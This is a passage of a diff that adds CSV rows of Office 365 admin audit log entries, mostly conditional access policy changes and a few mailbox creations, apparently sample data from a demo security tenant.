+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:41:40Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-03-26T18:07:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T18:05:39.4231761Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:07:17 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:06:26Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-03-26T18:46:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ffa04e8b-d571-444b-9e99-eab9a6eacbc9""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:46:34 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:46:07Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\77ef108d-66cc-4170-b084-e23986231beb""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""203b278f-5449-4f77-a847-60fe5e707ead\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:46:06 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test 2 Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:46:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T18:40:12.7394779Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:46:25 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:44:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T18:40:12.7394779Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:44:39 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:17:42Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T18:05:39.4231761Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:17:42 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:13:44Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ffa04e8b-d571-444b-9e99-eab9a6eacbc9""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:13:44 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:11:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T18:40:12.7394779Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:11:10 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T20:19:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T19:24:16.8281546Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 8:19:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T22:40:30Z,,,New-Mailbox,"[
+  {
+    ""Name"": ""MailboxRegion"",
+    ""Value"": ""NAM""
+  },
+  {
+    ""Name"": ""Name"",
+    ""Value"": ""SPO_Arbitration_e509dcd8-e05e-4931-806f-8ac73e19d1ed""
+  },
+  {
+    ""Name"": ""UserPrincipalName"",
+    ""Value"": ""SPO_Arbitration_e509dcd8-e05e-4931-806f-8ac73e19d1ed@seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OfficeGraph"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SkipMailboxRegionValidation"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  }
+]"
+2020-03-26T22:40:33Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NGIyNDYyYTQtYmJlZS00OTVhLWEwZTEtZjIzYWU1MjRjYzljXGMzNzQ0Mzc1LTlhMTctNDM2Yi04YzI3LTkzMmM4MzFjYzU5MQ2""
+  },
+  {
+    ""Name"": ""MailboxRegion"",
+    ""Value"": ""NAM""
+  },
+  {
+    ""Name"": ""ResourceEmailAddresses"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SkipMailboxRegionValidation"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": ""BY5PR06A07DC002.NAMPR06A007.PROD.OUTLOOK.COM""
+  },
+  {
+    ""Name"": ""EmailAddresses"",
+    ""Value"": ""SMTP:SPO_Arbitration_e509dcd8-e05e-4931-806f-8ac73e19d1ed@seccxpninja.onmicrosoft.com;SPO:SPO_e509dcd8-e05e-4931-806f-8ac73e19d1ed@SPO_4b2462a4-bbee-495a-a0e1-f23ae524cc9c""
+  }
+]"
+2020-04-15T06:14:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-15T06:14:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T06:14:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 6:14:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:54 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-15T03:13:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
